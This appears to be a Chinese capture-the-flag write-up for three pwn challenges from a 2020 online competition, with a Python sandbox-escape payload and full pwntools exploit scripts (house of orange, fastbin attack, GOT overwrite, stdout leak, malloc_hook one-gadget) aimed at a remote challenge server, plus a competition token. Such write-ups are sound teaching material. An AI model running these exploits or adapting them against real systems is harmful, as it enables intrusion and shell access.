2020国赛线上赛 pwn wp

babyjsc

题目给了一大堆文件，先nc上测一下，直接enter可以看到返回的错误信息，知道远程服务器为server.py
然后把下载下来的文件解压，搜索server.py ，查看可知

python input()的时候沙箱逃逸，直接import(‘os’).system(“cat /home/ctf/flag”) ,获取到flag

nofree

申请堆块的时候是用strdup来申请的，strdup是根据输入的字符串长度来申请堆块的，若add(0,0x90,‘aaaa’)，edit的时候则造成溢出。
此题没有free功能，利用house of orange 攻击 造成一个free过后的堆块，然后伪造size，通过溢出修改 free过后堆块的fd为chunklist附近区域，然后fastbin attack 申请堆块到chunklist，控制堆块指针，修改chunklist[1]为strdup函数的got表，edit功能修改strdup的got表为printf_got,再利用格式化字符串漏洞泄露libc_addr，最后再次修改strdup_got为system_got,然后申请”/bin/sh”的堆块，即可得到shell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys
context.log_level = 'debug'
pwn_name = "pwn"
arch = '64'
version = '2.23'
ip, port = '101.200.53.148',12301
#context.terminal = ['tmux', 'splitw', '-h']
#context(os='linux', arch='i386')
if sys.argv[1]=="l":
	p=process('./'+pwn_name)
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
else:
	p=remote(ip,port)
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)

elf=ELF(pwn_name,checksec=False)


def info(con,leak):
    success('{} => {:#x}'.format(con,leak))

def dbg(address=0):
    if address==0:
        gdb.attach(p)
        pause()
    else:
        if address > 0xfffff:
            script="b *{:#x}\nc\n".format(address)
        else:
            script="b *$rebase({:#x})\nc\n".format(address)
        gdb.attach(p, script)

#---------------heap-------------
def choice(idx):
    p.sendlineafter(">> ", str(idx))

def add(idx, size, content):
    choice(1)
    p.sendlineafter(": ",str(idx))
    p.sendlineafter(': ', str(size))
    p.sendafter(': ', content)

def edit(idx, content):
    choice(2)
    p.sendlineafter(': ',str(idx))
    p.sendafter(': ', content)

#---------house of orange-------------
add(0,0x90,'a'*0x4)

edit(0,p64(0)*3+p64(0xfe1))

for i in range(0,0x1e):
    add(1,0x70,chr(i)*0x70)

add(0,0x81,chr(0x20)*0x40)
add(0,0x71,chr(0x21)*0x40)

add(1,0x90,chr(0x22)*0x90) # fastbin 
#----------fastbin attack-----------
edit(0,p64(0x20)*8+p64(0)+p64(0x81)+p64(0x602128))


add(0,0x90,chr(0x23)*0x70+p64(0x81))
add(0,0x90,chr(0x24)*0x70+p64(0x81))

#---------chunklist attack---------
edit(0,"e"*0x88+p64(0x6021c0))

edit(0,p64(0x6021c0)+p64(0x100)+p64(0x602068)+p64(0x100))

edit(1,p64(elf.plt["printf"]))
add(2,0x90,"%17$p")

p.recvuntil("0x")
libc_base = int(p.recv(12),16) -240-libc.sym["__libc_start_main"]
info("libc_base",libc_base)
sys_addr = libc_base + 0x45390
info("sys_addr",sys_addr)

edit(1,p64(sys_addr))
add(2,0x90,"/bin/sh")

p.interactive()

easybox

off-by-one漏洞，没有show功能，老套路了，布局堆块，溢出修改下一个堆块的size包含多个堆块，然后free，根据unsorted bin的特性使得fastbin里面有残留的main_area地址然后修改后两位字节，有十六分之一的几率为 stdout_addr-0x43，然后fastbin_attack 打_IO_2_1_stdout_,修改io_flags为0xfbad1887即可泄露出libc_addr,再次fastbin_attack 打malloc_hook为onegadget

from pwn import *

def exp():
	try:
		p=remote("101.200.53.148", 34521)
		#p = process('./pwn')
		elf = ELF('./pwn')
		libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

		def dbg(address=0):
		    if address==0:
		        gdb.attach(p)
		        pause()
		    else:
		        if address > 0xfffff:
		            script="b *{:#x}\nc\n".format(address)
		        else:
		            script="b *$rebase({:#x})\nc\n".format(address)
		        gdb.attach(p, script)

		def info(con,leak):
    		success('{} => {:#x}'.format(con,leak))

		def add(idx,size,content):
			p.sendlineafter('>>>','1')
			p.sendlineafter('idx:\n',str(idx))
			p.sendlineafter('len:\n',str(size))
			p.sendafter('content:\n',content)

		def delete(idx):
			p.sendlineafter('>>>','2')
			p.sendlineafter('idx:',str(idx))

		add(0,0xf0,'a'*8)
		add(1,0x60,'b'*8)
		add(2,0x88,'c'*8)
		add(3,0xf8,'d'*8)
		add(4,0xf0,'e'*8)
		add(5,0xf0,'f'*8)

		#dbg()
		delete(3)
		delete(0)
		add(3,0xf8,'\x00'*0xf0+p64(0x300)+'\x00')
		delete(4)
		delete(1)
		add(0,0xf0,'aaa')
		delete(0)
		add(0,0x130,'\x00'*0xf0+p64(0)+p64(0x71)+'\xdd\x25')

		add(1,0x68,'aaa')
		add(4,0x68,'\x00'*0x33+p64(0xfbad1887)+p64(0)*3+'\x88')

		libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_']
		
		info('libc_base',libc_base)
		malloc_hook  = libc_base + libc.sym['__malloc_hook']
		io_list_all = libc_base + 0x3c54fd

		#one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
		one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
		add(6,0x28,"\x41"*8)
		add(7,0x68,'\x42'*8)
		add(8,0x68,'\x43'*8)
		delete(6)
		add(6,0x28,"0"*0x28+'\xe1')

		delete(8)
		delete(7)
		add(8,0xa0,"3"*0x68+p64(0x71)+p64(malloc_hook-0x23))
		#add(8,0xa0,"3"*0x68+p64(0x71)+p64(io_list_all))

		add(7,0x68,"\x44"*8)

		add(9,0x68,"a"*0x13+p64(libc_base + one[2]))
		delete(9)
		p.sendlineafter("please input your token:",'icq700049c29f86f68a9b934524cf619')
		p.sendline("cat flag")
		p.interactive()
	
	except Exception as e:
		print(e)
		p.close()

while True:
	exp()